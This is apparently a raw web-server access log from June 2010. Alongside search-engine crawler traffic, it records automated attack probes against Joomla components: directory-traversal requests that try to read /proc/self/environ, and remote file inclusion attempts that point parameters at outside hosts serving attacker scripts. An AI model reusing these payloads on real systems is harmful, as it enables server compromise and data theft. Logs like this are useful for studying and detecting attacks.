205.209.170.18 - - [07/Jun/2010:03:29:21 -0500] "GET /logs/access_log.1216857600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:25 -0500] "GET /logs/access_log.1216944000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:26 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:29 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:34 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:35 -0500] "GET /logs/access_log.1217289600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:37 -0500] "GET /logs/access_log.1217548800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:40 -0500] "GET /logs/access_log.1217721600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:42 -0500] "GET /logs/access_log.1218931200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:43 -0500] "GET /logs/access_log.1219017600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:45 -0500] "GET /logs/access_log.1219536000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:46 -0500] "GET /logs/access_log.1219881600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:48 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:51 -0500] "GET /logs/access_log.1225584000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:52 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:56 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:29:59 -0500] "GET /logs/access_log.1225843200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:00 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:02 -0500] "GET /logs/access_log.1226016000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:06 -0500] "GET /logs/access_log.1226620800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:08 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:12 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:13 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
174.142.61.152 - - [07/Jun/2010:03:30:15 -0500] "GET /logs/components/com_rwcards/captcha/captcha_image.php?img=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.142.61.152 - - [07/Jun/2010:03:30:15 -0500] "GET /logs/access_log.1271548800/components/com_rwcards/captcha/captcha_image.php?img=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
174.142.61.152 - - [07/Jun/2010:03:30:15 -0500] "GET /components/com_rwcards/captcha/captcha_image.php?img=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
205.209.170.18 - - [07/Jun/2010:03:30:22 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:24 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
205.209.170.18 - - [07/Jun/2010:03:30:39 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
94.23.35.17 - - [07/Jun/2010:03:31:49 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:03:31:50 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
94.23.35.17 - - [07/Jun/2010:03:31:50 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
91.121.164.97 - - [07/Jun/2010:03:31:50 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:03:31:51 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:03:31:51 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.803"
75.25.154.162 - - [07/Jun/2010:03:31:51 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:03:31:52 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:03:31:52 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
64.57.240.235 - - [07/Jun/2010:03:32:01 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
94.23.35.17 - - [07/Jun/2010:03:32:03 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
91.121.164.97 - - [07/Jun/2010:03:32:28 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
205.209.170.18 - - [07/Jun/2010:03:33:16 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)"
66.209.177.98 - - [07/Jun/2010:03:33:53 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:03:33:53 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
209.90.77.189 - - [07/Jun/2010:03:33:57 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
209.90.77.189 - - [07/Jun/2010:03:33:58 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
209.90.77.189 - - [07/Jun/2010:03:33:58 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
66.209.177.98 - - [07/Jun/2010:03:33:58 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
74.53.154.162 - - [07/Jun/2010:03:34:10 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:03:34:10 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
88.191.94.188 - - [07/Jun/2010:03:35:03 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:35:03 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:35:09 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:35:09 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.53.154.162 - - [07/Jun/2010:03:35:14 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
209.90.77.189 - - [07/Jun/2010:03:38:34 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
209.90.77.189 - - [07/Jun/2010:03:38:34 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
209.90.77.189 - - [07/Jun/2010:03:38:34 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
64.57.240.235 - - [07/Jun/2010:03:39:39 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
64.57.240.235 - - [07/Jun/2010:03:39:39 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
64.57.240.235 - - [07/Jun/2010:03:39:39 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
94.23.35.17 - - [07/Jun/2010:03:40:45 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
91.121.164.97 - - [07/Jun/2010:03:40:45 -0500] "GET /logs/access_log.1273017600/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
94.23.35.17 - - [07/Jun/2010:03:40:45 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
91.121.164.97 - - [07/Jun/2010:03:40:45 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
94.23.35.17 - - [07/Jun/2010:03:40:45 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
91.121.164.97 - - [07/Jun/2010:03:40:45 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.803"
74.53.154.162 - - [07/Jun/2010:03:41:07 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:03:41:08 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:03:41:08 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
88.191.94.188 - - [07/Jun/2010:03:43:09 -0500] "GET /logs/index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:43:09 -0500] "GET /logs/index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:43:09 -0500] "GET /index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:43:09 -0500] "GET /index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.53.154.162 - - [07/Jun/2010:03:43:13 -0500] "GET /logs/access_log.1274832000/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:03:43:13 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:03:43:13 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:03:44:03 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.53.154.162 - - [07/Jun/2010:03:44:42 -0500] "GET /logs/access_log.1274313600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
207.46.195.225 - - [07/Jun/2010:03:47:07 -0500] "GET /logs/access_log.1255737600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [07/Jun/2010:03:56:04 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:56:04 -0500] "GET /index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:56:05 -0500] "GET /logs/index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:56:10 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:56:11 -0500] "GET /index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:03:56:11 -0500] "GET /logs/index.php?option=com_hsconfig&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [07/Jun/2010:03:57:33 -0500] "GET /logs/access_log.1199577600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.6.10.110 - - [07/Jun/2010:04:08:10 -0500] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.6.10.110 - - [07/Jun/2010:04:08:10 -0500] "GET /logs/access_log.1272585600//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.6.10.110 - - [07/Jun/2010:04:08:10 -0500] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.6.10.110 - - [07/Jun/2010:04:08:10 -0500] "GET /logs/access_log.1271894400//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.tourfox.ch/casper/Ckrid1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
163.24.136.10 - - [07/Jun/2010:04:08:43 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
163.24.136.10 - - [07/Jun/2010:04:08:44 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
163.24.136.10 - - [07/Jun/2010:04:08:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
163.24.136.10 - - [07/Jun/2010:04:10:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
163.24.136.10 - - [07/Jun/2010:04:10:43 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
163.24.136.10 - - [07/Jun/2010:04:10:44 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.7.108.203 - - [07/Jun/2010:04:11:14 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
109.123.73.50 - - [07/Jun/2010:04:13:04 -0500] "GET //index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
190.152.145.54 - - [07/Jun/2010:04:13:48 -0500] "GET /logs/access_log.1273363200%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:04:13:48 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:04:13:48 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
190.152.145.54 - - [07/Jun/2010:04:14:36 -0500] "GET /logs/access_log.1274832000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
109.123.73.50 - - [07/Jun/2010:04:15:22 -0500] "GET /index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
190.152.145.54 - - [07/Jun/2010:04:16:23 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.ehtsc.co.cu/cidtur//components/com_jcalpro/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.38.67.248 - - [07/Jun/2010:04:16:41 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.813"
84.38.67.248 - - [07/Jun/2010:04:16:42 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.813"
207.7.108.203 - - [07/Jun/2010:04:20:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [07/Jun/2010:04:20:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [07/Jun/2010:04:20:20 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
109.123.73.50 - - [07/Jun/2010:04:20:27 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
109.123.73.50 - - [07/Jun/2010:04:21:06 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_myblog&Itemid=28&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
